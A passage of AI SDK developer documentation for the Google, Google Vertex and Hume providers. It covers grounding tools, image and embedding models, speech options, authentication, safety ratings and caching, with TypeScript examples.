                "endIndex": 157,
                "text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
            },
            "groundingChunkIndices": [
                0
            ]
        },
    ]
}

You can add up to 20 URLs per request.

Combine URL Context with Search Grounding

You can combine the URL context tool with search grounding to provide the model with the latest information from the web.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google, tell me how to use Gemini with AI SDK.
    Also, provide the latest news about AI SDK V5.`,
  tools: {
    google_search: google.tools.googleSearch({}),
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

Google Maps Grounding

With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_maps: google.tools.googleMaps({}),
  },
  providerOptions: {
    google: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt:
    'What are the best Italian restaurants within a 15-minute walk from here?',
});

const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;

When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "maps": {
          "uri": "https://maps.google.com/?cid=12345",
          "title": "Restaurant Name",
          "placeId": "places/ChIJ..."
        }
      }
    ]
  }
}

Google Maps grounding is supported on Gemini 2.0 and newer models.

RAG Engine Grounding

With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.

import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
});

const { text, sources, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    vertex_rag_store: vertex.tools.vertexRagStore({
      ragCorpus:
        'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
      topK: 5,
    }),
  },
  prompt:
    'What are the key features of our product according to our documentation?',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.

Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:

groundingChunks (Array of chunk objects | null)
- Contains the retrieved context chunks from your RAG corpus
- Each chunk includes:
  - retrievedContext: Information about the retrieved context
    - uri: The URI or identifier of the source document
    - title: The title of the source document (optional)
    - text: The actual text content of the chunk
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by RAG results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting RAG result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "retrievedContext": {
          "uri": "gs://my-bucket/docs/product-guide.pdf",
          "title": "Product User Guide",
          "text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
        }
      }
    ],
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 45,
          "text": "Our product includes advanced AI capabilities and real-time processing."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.95]
      }
    ]
  }
}

Configuration Options

The vertexRagStore tool accepts the following configuration options:

ragCorpus (string, required)
- The RagCorpus resource name in the format: projects/{project}/locations/{location}/ragCorpora/{rag_corpus}
- This identifies your specific RAG corpus to search against
topK (number, optional)
- The number of top contexts to retrieve from your RAG corpus
- Defaults to the corpus configuration if not specified

Image Outputs

Gemini models with image generation capabilities (e.g. gemini-2.5-flash-image) support generating images as part of a multimodal response. Images are exposed as files in the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image'),
  prompt:
    'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    console.log('Generated image:', file);
  }
}

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

Troubleshooting

Schema Limitations

The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const { output } = await generateText({
  model: google('gemini-2.5-flash'),
  providerOptions: {
    google: {
      structuredOutputs: false,
    } satisfies GoogleLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number(),
      contact: z.union([
        z.object({
          type: z.literal('email'),
          value: z.string(),
        }),
        z.object({
          type: z.literal('phone'),
          value: z.string(),
        }),
      ]),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Google Search	URL Context
`gemini-3.1-pro-preview`
`gemini-3.1-flash-image-preview`
`gemini-3.1-flash-lite-preview`
`gemini-3-pro-preview`
`gemini-3-pro-image-preview`
`gemini-3-flash-preview`
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.5-flash-lite`
`gemini-2.5-flash-lite-preview-06-17`
`gemini-2.0-flash`

Gemma Models

You can use Gemma models with the Google Generative AI API. The following Gemma models are available:

gemma-3-27b-it
gemma-3-12b-it

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemma-3-27b-it'),
  system: 'You are a helpful assistant that responds concisely.',
  prompt: 'What is machine learning?',
});

The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.

Embedding Models

You can create models that call the Google Generative AI embeddings API using the .embedding() factory method.

const model = google.embedding('gemini-embedding-001');

The Google provider sends API calls to the right endpoint based on the type of embedding:

Single embeddings: When embedding a single value with embed(), the provider uses the single :embedContent endpoint, which typically has higher rate limits compared to the batch endpoint.
Batch embeddings: When embedding multiple values with embedMany() or multiple values in embed(), the provider uses the :batchEmbedContents endpoint.

Google embedding models support additional settings. You can pass them as an options argument:

import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embed } from 'ai';

const model = google.embedding('gemini-embedding-001');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    google: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (only 1 here, since `value` is only a single one)
    } satisfies GoogleEmbeddingModelOptions,
  },
});

When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:

import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: google.embedding('gemini-embedding-2-preview'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
  providerOptions: {
    google: {
      // content array must have the same length as values
      content: [
        [{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
        null, // text-only, pairs with values[1]
      ],
    } satisfies GoogleEmbeddingModelOptions,
  },
});

The following optional provider options are available for Google embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
content: array

Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index — its parts are merged with the text value in the request. Use null for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either { text: string } or { inlineData: { mimeType: string, data: string } }. Supported by gemini-embedding-2-preview.

Model Capabilities

Model	Default Dimensions	Custom Dimensions	Multimodal
`gemini-embedding-001`	3072
`gemini-embedding-2-preview`	3072

Image Models

You can create image models that call the Google Generative AI API using the .image() factory method. For more on image generation with the AI SDK see generateImage().

The Google provider supports two types of image models:

Imagen models: Dedicated image generation models using the :predict API
Gemini image models: Multimodal language models with image output capabilities using the :generateContent API

Imagen Models

Imagen models are dedicated image generation models.

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google provider options. You can validate the provider options using the GoogleImageModelOptions type.

import { google } from '@ai-sdk/google';
import { GoogleImageModelOptions } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  providerOptions: {
    google: {
      personGeneration: 'dont_allow',
    } satisfies GoogleImageModelOptions,
  },
  // ...
});

The following provider options are available for Imagen models:

personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.

Imagen Model Capabilities

Model	Aspect Ratios
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Gemini Image Models

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: 'A photorealistic image of a cat wearing a wizard hat',
  aspectRatio: '1:1',
});

Gemini image models also support image editing by providing input images:

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
import fs from 'node:fs';

const sourceImage = fs.readFileSync('./cat.png');

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: [sourceImage],
  },
});

You can also use URLs for input images:

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: ['https://example.com/cat.png'],
  },
});

Gemini Image Model Capabilities

Model	Image Generation	Image Editing	Aspect Ratios
`gemini-2.5-flash-image`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3-pro-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3.1-flash-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9

title: Hume description: Learn how to use the Hume provider for the AI SDK.

Hume Provider

The Hume provider contains support for the Hume text-to-speech (TTS) API.

Setup

The Hume provider is available in the @ai-sdk/hume module. You can install it with

Provider Instance

You can import the default provider instance hume from @ai-sdk/hume:

import { hume } from '@ai-sdk/hume';

If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:

import { createHume } from '@ai-sdk/hume';

const hume = createHume({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Hume provider instance:

apiKey string

API key that is being sent using the X-Hume-Api-Key header. It defaults to the HUME_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Hume speech API using the .speech() factory method.

const model = hume.speech();

You can pass standard speech generation options like voice, speed, instructions, and outputFormat:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  speed: 1.0,
  instructions: 'Speak in a friendly, conversational tone.',
  outputFormat: 'mp3',
});

Supported Parameters

text string (required)

The text to convert to speech.
voice string

The voice ID to use for the generated audio. Defaults to 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453'.
speed number

Speech rate multiplier.
instructions string

Description or instructions for how the text should be spoken.
outputFormat string

The audio format to generate. Supported values: 'mp3', 'pcm', 'wav'. Defaults to 'mp3'.

Provider Options

You can pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
import { type HumeSpeechModelOptions } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  providerOptions: {
    hume: {
      context: {
        generationId: 'previous-generation-id',
      },
    } satisfies HumeSpeechModelOptions,
  },
});

The following provider options are available:

context object

Context for the speech synthesis request. Can be either:
- { generationId: string } - ID of a previously generated speech synthesis to use as context.
- { utterances: Utterance[] } - An array of utterance objects for context, where each utterance has:
  - text string (required) - The text content.
  - description string - Instructions for how the text should be spoken.
  - speed number - Speech rate multiplier.
  - trailingSilence number - Duration of silence to add after the utterance in seconds.
  - voice object - Voice configuration, either { id: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' } or { name: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' }.

Model Capabilities

Model	Instructions	Speed	Output Formats
`default`			mp3, pcm, wav

title: Google Vertex AI description: Learn how to use the Google Vertex AI provider.

Google Vertex Provider

Setup

The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with

Google Vertex Provider Usage

Provider Instance

You can import the default provider instance vertex from @ai-sdk/google-vertex:

import { vertex } from '@ai-sdk/google-vertex';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Google Vertex supports multiple authentication methods depending on your runtime environment and requirements.

Node.js Runtime

If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
baseURL string

Optional. Base URL for the Google Vertex API calls e.g. to use proxy servers. By default, it is constructed using the location and project: https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google

Edge Runtime

You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:

import { vertex } from '@ai-sdk/google-vertex/edge';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex/edge';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

These values can be obtained from a service account JSON file from the Google Cloud Console.

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Express Mode

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  apiKey: process.env.GOOGLE_VERTEX_API_KEY,
});

Optional Provider Settings

apiKey string

The API key for Google Vertex AI. When provided, the provider uses express mode with API key authentication instead of OAuth. It uses the GOOGLE_VERTEX_API_KEY environment variable by default.

Language Models

You can create models that call the Vertex API using the provider instance. The first argument is the model id, e.g. gemini-2.5-pro.

const model = vertex('gemini-2.5-pro');

Google Vertex models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';

const model = vertex('gemini-2.5-pro');

await generateText({
  model,
  providerOptions: {
    vertex: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    } satisfies GoogleLanguageModelOptions,
  },
});

The following optional provider options are available for Google Vertex models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: projects/{project}/locations/{location}/cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
audioTimestamp boolean

Optional. Enables timestamp understanding for audio files. Defaults to false.

This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.
labels object

Optional. Defines labels used in billing reports.

Consult Google's Documentation for usage details.
streamFunctionCallArguments boolean

Optional. When set to true, function call arguments will be streamed incrementally in streaming responses. This enables tool-input-delta events to arrive as the model generates function call arguments, reducing perceived latency for tool calls. Defaults to false. Only supported on the Vertex AI API (not the Gemini API) with Gemini 3+ models.

Consult Google's Documentation for details.

You can use Google Vertex language models to generate text with the generateText function:

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Vertex language models can also be used in the streamText function (see AI SDK Core).

Code Execution

You can enable code execution by adding the code_execution tool to your request.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { code_execution: vertex.tools.codeExecution({}) },
  prompt:
    'Use python to calculate 20th fibonacci number. Then find the nearest palindrome to it.',
});

The response will contain tool-call and tool-result parts for the executed code.

URL Context

URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { url_context: vertex.tools.urlContext({}) },
  prompt: 'What are the key points from https://example.com/article?',
});

Google Search

Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { google_search: vertex.tools.googleSearch({}) },
  prompt: 'What are the latest developments in AI?',
});

Enterprise Web Search

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
  },
  prompt: 'What are the latest FDA regulations for clinical trials?',
});

Google Maps

Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    google_maps: vertex.tools.googleMaps({}),
  },
  providerOptions: {
    vertex: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'What are the best Italian restaurants nearby?',
});

The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.

Streaming Function Call Arguments

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { streamText } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: vertex('gemini-3.1-pro-preview'),
  prompt: 'What is the weather in Boston and San Francisco?',
  tools: {
    getWeather: {
      description: 'Get the current weather in a given location',
      inputSchema: z.object({
        location: z.string().describe('City name'),
      }),
    },
  },
  providerOptions: {
    vertex: {
      streamFunctionCallArguments: true,
    } satisfies GoogleLanguageModelOptions,
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'tool-input-start':
      console.log(`Tool call started: ${part.toolName}`);
      break;
    case 'tool-input-delta':
      process.stdout.write(part.delta);
      break;
    case 'tool-call':
      console.log(`Tool call complete: ${part.toolName}`, part.input);
      break;
  }
}

Reasoning (Thinking Tokens)

Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.

To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. These options are passed through providerOptions.vertex:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, streamText } from 'ai';

// For generateText:
const { text, reasoningText, reasoning } = await generateText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    vertex: {
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);

// For streamText:
const result = streamText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    vertex: {
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.

In generateText, these contribute to the reasoningText (string) and reasoning (array) fields.
In streamText, these are emitted as reasoning stream parts.

File Inputs

The Google Vertex provider supports file inputs, e.g. PDF files.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-2.5-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google Vertex AI supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.vertex);
// e.g.
// {
//   groundingMetadata: null,
//   safetyRatings: null,
//   usageMetadata: {
//     cachedContentTokenCount: 2027,
//     thoughtsTokenCount: 702,
//     promptTokenCount: 2152,
//     candidatesTokenCount: 710,
//     totalTokenCount: 3564
//   }
// }

Explicit Caching

You can use explicit caching with Gemini models. See the Vertex AI context caching documentation to check if caching is supported for your model.

First, create a cache using the Google GenAI SDK with Vertex mode enabled:

import { GoogleGenAI } from '@google/genai';

const ai = new GoogleGenAI({
  vertexai: true,
  project: process.env.GOOGLE_VERTEX_PROJECT,
  location: process.env.GOOGLE_VERTEX_LOCATION,
});

const model = 'gemini-2.5-pro';

// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
  model,
  config: {
    contents: [
      {
        role: 'user',
        parts: [{ text: '1000 Lasagna Recipes...' }],
      },
    ],
    ttl: '300s', // Cache expires after 5 minutes
  },
});

console.log('Cache created:', cache.name);
// e.g. projects/my-project/locations/us-central1/cachedContents/abc123

Then use the cache with the AI SDK:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text: veggieLasagnaRecipe } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    vertex: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

const { text: meatLasagnaRecipe } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a meat lasagna recipe for 12 people.',
  providerOptions: {
    vertex: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
